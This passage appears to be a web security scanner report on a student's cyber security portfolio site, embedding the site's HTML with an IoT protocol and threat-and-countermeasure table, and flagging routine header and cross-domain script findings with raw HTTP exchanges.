          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
          <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
           <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
          <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
           </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
           <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Parameter
          https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js
          Evidence
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          Solution

          Ensure JavaScript source files are loaded from only trusted sources, and the sources can't be controlled by end users of the application.

      3. Incomplete or No Cache-control Header Set (3)
        1. GET https://beekmans.dev
          Alert tags
          Alert description

          The cache-control header has not been set properly or is missing, allowing the browser and proxies to cache content.

          Request
          Request line and header section (192 bytes)
          GET https://beekmans.dev HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1047 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:11 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4lOrbKK8y%2Bn8QLhKEGpB7rePrCHT1J%2BQaOZJP06h5%2BW2GkK9CRq%2Fdn7ChLzJzoJLiDaKfMYCpMPOGx7ddQ5eVNaVcohEeYRecx%2BV4c%2BapqYy04o6ANFaN3V3sF2rfmk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a31e5f8a4c13-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178340 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
